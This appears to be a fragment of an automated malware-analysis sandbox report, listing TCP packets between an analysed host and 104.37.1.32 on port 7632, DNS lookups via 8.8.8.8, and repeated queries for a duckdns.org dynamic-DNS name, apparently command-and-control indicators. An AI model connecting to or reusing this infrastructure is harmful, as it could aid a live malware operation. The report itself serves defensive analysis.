                Apr 4, 2021 23:29:51.729835033 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.729835033 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:51.729923964 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.729928017 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:51.729959965 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.729995966 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.729995966 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:51.730029106 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730073929 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730112076 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:51.730113029 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730149031 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730149031 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:51.730185032 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730221033 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:51.730223894 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730261087 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730298042 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730326891 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:51.730330944 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730376959 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:51.730418921 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:51.730623007 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.093348026 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.093472958 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.093555927 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.093661070 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.093969107 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094069958 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.094084978 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094151974 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094216108 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094269037 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.094301939 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094374895 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094418049 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.094434977 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094496965 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094536066 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.094557047 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094616890 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094651937 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.094676971 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094739914 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094772100 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.094806910 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094877958 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.094883919 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.094942093 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095005989 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095014095 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095067978 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095130920 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095139027 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095192909 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095254898 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095288992 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095324039 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095402002 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095431089 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095455885 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095496893 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095536947 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095566988 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095582962 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095602036 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095607996 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095649958 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095689058 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095726013 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095726967 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095767021 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095804930 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095804930 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095861912 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095868111 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095911026 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095947981 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.095952988 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.095990896 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096028090 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.096029997 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096069098 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096105099 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096107006 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.096143961 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096180916 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.096182108 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096230030 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096273899 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096309900 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096326113 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.096350908 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096390009 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.096390963 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.096430063 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.144073963 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.457933903 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.457998991 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.458192110 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.459356070 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.459398031 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.459533930 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.459974051 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460016012 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460053921 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460114956 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.460124016 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460166931 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460212946 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.460232019 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460278034 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460328102 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.460350037 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460391045 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460443020 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.460454941 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460495949 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460550070 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.460556984 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460608006 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460661888 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.460688114 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460728884 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460784912 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.460802078 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460843086 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460896015 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.460906982 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.460954905 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461003065 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461030960 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461072922 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461124897 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461150885 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461191893 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461239100 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461255074 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461293936 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461353064 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461361885 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461455107 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461461067 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461504936 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461541891 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461580992 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461618900 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461673021 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461680889 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461721897 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461759090 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461782932 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461819887 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461859941 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461899042 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461925030 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.461976051 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.461987019 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.462035894 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.462101936 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.462111950 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.462184906 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.462225914 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.462261915 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.462305069 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.462409973 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.507989883 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.550079107 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.822272062 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.822295904 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.822482109 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.822746992 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.822772980 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.822840929 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.822894096 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.822913885 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.822982073 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.823143959 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.823162079 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.823214054 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.823740005 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.823797941 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.823925972 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.824110031 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824129105 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824148893 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824203014 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824203014 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.824306965 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.824748039 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824764967 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824806929 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824829102 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824841022 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.824850082 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.824901104 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.826564074 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826586008 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826606989 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826647043 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.826685905 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826693058 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.826713085 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826735973 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826757908 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826781034 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826803923 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.826816082 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.826853991 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827238083 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827295065 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827317953 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827339888 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827361107 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827383995 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827404976 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827408075 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827440977 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827451944 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827476025 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827497959 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827521086 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827538013 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827589989 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827722073 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827742100 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827761889 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827784061 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827804089 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827806950 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827830076 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827837944 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827852011 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827860117 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827872992 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827894926 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827903986 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827917099 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827944040 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.827959061 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.827986002 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.828000069 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.828005075 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.828021049 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:52.828217983 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:52.990060091 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:53.394474030 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:53.634154081 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:53.645965099 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:53.999061108 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:53.999406099 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:54.010848999 CEST763249758104.37.1.32192.168.2.3
                Apr 4, 2021 23:29:54.010991096 CEST497587632192.168.2.3104.37.1.32
                Apr 4, 2021 23:29:54.011050940 CEST497587632192.168.2.3104.37.1.32

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 4, 2021 23:27:49.038294077 CEST4919953192.168.2.38.8.8.8
                Apr 4, 2021 23:27:49.261029005 CEST53491998.8.8.8192.168.2.3
                Apr 4, 2021 23:27:56.445205927 CEST5062053192.168.2.38.8.8.8
                Apr 4, 2021 23:27:56.662151098 CEST53506208.8.8.8192.168.2.3
                Apr 4, 2021 23:28:03.542203903 CEST6493853192.168.2.38.8.8.8
                Apr 4, 2021 23:28:03.761682034 CEST53649388.8.8.8192.168.2.3
                Apr 4, 2021 23:28:04.803078890 CEST6015253192.168.2.38.8.8.8
                Apr 4, 2021 23:28:04.849164963 CEST53601528.8.8.8192.168.2.3
                Apr 4, 2021 23:28:06.741105080 CEST5754453192.168.2.38.8.8.8
                Apr 4, 2021 23:28:06.787158012 CEST53575448.8.8.8192.168.2.3
                Apr 4, 2021 23:28:07.734889984 CEST5598453192.168.2.38.8.8.8
                Apr 4, 2021 23:28:07.792582035 CEST53559848.8.8.8192.168.2.3
                Apr 4, 2021 23:28:09.089135885 CEST6418553192.168.2.38.8.8.8
                Apr 4, 2021 23:28:09.135360003 CEST53641858.8.8.8192.168.2.3
                Apr 4, 2021 23:28:10.585750103 CEST6511053192.168.2.38.8.8.8
                Apr 4, 2021 23:28:10.640908003 CEST53651108.8.8.8192.168.2.3
                Apr 4, 2021 23:28:10.745469093 CEST5836153192.168.2.38.8.8.8
                Apr 4, 2021 23:28:10.791532993 CEST53583618.8.8.8192.168.2.3
                Apr 4, 2021 23:28:11.081908941 CEST6349253192.168.2.38.8.8.8
                Apr 4, 2021 23:28:11.136420965 CEST53634928.8.8.8192.168.2.3
                Apr 4, 2021 23:28:12.037904024 CEST6083153192.168.2.38.8.8.8
                Apr 4, 2021 23:28:12.088419914 CEST53608318.8.8.8192.168.2.3
                Apr 4, 2021 23:28:13.710771084 CEST6010053192.168.2.38.8.8.8
                Apr 4, 2021 23:28:13.758236885 CEST53601008.8.8.8192.168.2.3
                Apr 4, 2021 23:28:14.694706917 CEST5319553192.168.2.38.8.8.8
                Apr 4, 2021 23:28:14.743582964 CEST53531958.8.8.8192.168.2.3
                Apr 4, 2021 23:28:15.735630035 CEST5014153192.168.2.38.8.8.8
                Apr 4, 2021 23:28:15.784890890 CEST53501418.8.8.8192.168.2.3
                Apr 4, 2021 23:28:16.674731970 CEST5302353192.168.2.38.8.8.8
                Apr 4, 2021 23:28:16.732192993 CEST53530238.8.8.8192.168.2.3
                Apr 4, 2021 23:28:17.632543087 CEST4956353192.168.2.38.8.8.8
                Apr 4, 2021 23:28:17.693592072 CEST53495638.8.8.8192.168.2.3
                Apr 4, 2021 23:28:17.743386030 CEST5135253192.168.2.38.8.8.8
                Apr 4, 2021 23:28:17.801120996 CEST53513528.8.8.8192.168.2.3
                Apr 4, 2021 23:28:18.257747889 CEST5934953192.168.2.38.8.8.8
                Apr 4, 2021 23:28:18.306502104 CEST53593498.8.8.8192.168.2.3
                Apr 4, 2021 23:28:19.872931957 CEST5708453192.168.2.38.8.8.8
                Apr 4, 2021 23:28:19.919162989 CEST53570848.8.8.8192.168.2.3
                Apr 4, 2021 23:28:20.815366030 CEST5882353192.168.2.38.8.8.8
                Apr 4, 2021 23:28:20.872797966 CEST53588238.8.8.8192.168.2.3
                Apr 4, 2021 23:28:21.869697094 CEST5756853192.168.2.38.8.8.8
                Apr 4, 2021 23:28:21.926772118 CEST53575688.8.8.8192.168.2.3
                Apr 4, 2021 23:28:22.839046955 CEST5054053192.168.2.38.8.8.8
                Apr 4, 2021 23:28:22.886606932 CEST53505408.8.8.8192.168.2.3
                Apr 4, 2021 23:28:23.839943886 CEST5436653192.168.2.38.8.8.8
                Apr 4, 2021 23:28:23.888782024 CEST53543668.8.8.8192.168.2.3
                Apr 4, 2021 23:28:24.532970905 CEST5303453192.168.2.38.8.8.8
                Apr 4, 2021 23:28:24.589590073 CEST53530348.8.8.8192.168.2.3
                Apr 4, 2021 23:28:24.676455021 CEST5776253192.168.2.38.8.8.8
                Apr 4, 2021 23:28:24.771375895 CEST5543553192.168.2.38.8.8.8
                Apr 4, 2021 23:28:24.817553043 CEST53554358.8.8.8192.168.2.3
                Apr 4, 2021 23:28:24.894534111 CEST53577628.8.8.8192.168.2.3
                Apr 4, 2021 23:28:25.706242085 CEST5071353192.168.2.38.8.8.8
                Apr 4, 2021 23:28:25.752409935 CEST53507138.8.8.8192.168.2.3
                Apr 4, 2021 23:28:27.192620039 CEST5613253192.168.2.38.8.8.8
                Apr 4, 2021 23:28:27.238601923 CEST53561328.8.8.8192.168.2.3
                Apr 4, 2021 23:28:31.679709911 CEST5898753192.168.2.38.8.8.8
                Apr 4, 2021 23:28:31.734234095 CEST53589878.8.8.8192.168.2.3
                Apr 4, 2021 23:28:32.639250040 CEST5657953192.168.2.38.8.8.8
                Apr 4, 2021 23:28:32.697376966 CEST53565798.8.8.8192.168.2.3
                Apr 4, 2021 23:28:37.741369963 CEST6063353192.168.2.38.8.8.8
                Apr 4, 2021 23:28:37.795965910 CEST53606338.8.8.8192.168.2.3
                Apr 4, 2021 23:28:39.832514048 CEST6129253192.168.2.38.8.8.8
                Apr 4, 2021 23:28:39.901659012 CEST53612928.8.8.8192.168.2.3
                Apr 4, 2021 23:28:44.654107094 CEST6361953192.168.2.38.8.8.8
                Apr 4, 2021 23:28:44.702361107 CEST53636198.8.8.8192.168.2.3
                Apr 4, 2021 23:28:46.461860895 CEST6493853192.168.2.38.8.8.8
                Apr 4, 2021 23:28:46.511311054 CEST53649388.8.8.8192.168.2.3
                Apr 4, 2021 23:28:49.176647902 CEST6194653192.168.2.38.8.8.8
                Apr 4, 2021 23:28:49.232676029 CEST53619468.8.8.8192.168.2.3
                Apr 4, 2021 23:28:51.660936117 CEST6491053192.168.2.38.8.8.8
                Apr 4, 2021 23:28:51.716820002 CEST53649108.8.8.8192.168.2.3
                Apr 4, 2021 23:28:58.669763088 CEST5212353192.168.2.38.8.8.8
                Apr 4, 2021 23:28:58.726671934 CEST53521238.8.8.8192.168.2.3
                Apr 4, 2021 23:29:05.785725117 CEST5613053192.168.2.38.8.8.8
                Apr 4, 2021 23:29:06.010046005 CEST53561308.8.8.8192.168.2.3
                Apr 4, 2021 23:29:12.945137978 CEST5633853192.168.2.38.8.8.8
                Apr 4, 2021 23:29:12.999483109 CEST53563388.8.8.8192.168.2.3
                Apr 4, 2021 23:29:19.796566010 CEST5942053192.168.2.38.8.8.8
                Apr 4, 2021 23:29:19.851269960 CEST53594208.8.8.8192.168.2.3
                Apr 4, 2021 23:29:21.402164936 CEST5878453192.168.2.38.8.8.8
                Apr 4, 2021 23:29:21.452594042 CEST53587848.8.8.8192.168.2.3
                Apr 4, 2021 23:29:23.096050024 CEST6397853192.168.2.38.8.8.8
                Apr 4, 2021 23:29:23.159303904 CEST53639788.8.8.8192.168.2.3
                Apr 4, 2021 23:29:26.843811989 CEST6293853192.168.2.38.8.8.8
                Apr 4, 2021 23:29:27.060240030 CEST53629388.8.8.8192.168.2.3
                Apr 4, 2021 23:29:33.802197933 CEST5570853192.168.2.38.8.8.8
                Apr 4, 2021 23:29:33.857985020 CEST53557088.8.8.8192.168.2.3
                Apr 4, 2021 23:29:40.857156992 CEST5680353192.168.2.38.8.8.8
                Apr 4, 2021 23:29:40.911663055 CEST53568038.8.8.8192.168.2.3
                Apr 4, 2021 23:29:49.050914049 CEST5714553192.168.2.38.8.8.8
                Apr 4, 2021 23:29:49.105664015 CEST53571458.8.8.8192.168.2.3

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Apr 4, 2021 23:27:49.038294077 CEST192.168.2.38.8.8.80xb115Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:27:56.445205927 CEST192.168.2.38.8.8.80x1578Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:28:03.542203903 CEST192.168.2.38.8.8.80x7c8bStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:28:10.585750103 CEST192.168.2.38.8.8.80x50b7Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:28:17.743386030 CEST192.168.2.38.8.8.80x5bbcStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:28:24.676455021 CEST192.168.2.38.8.8.80x4f37Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
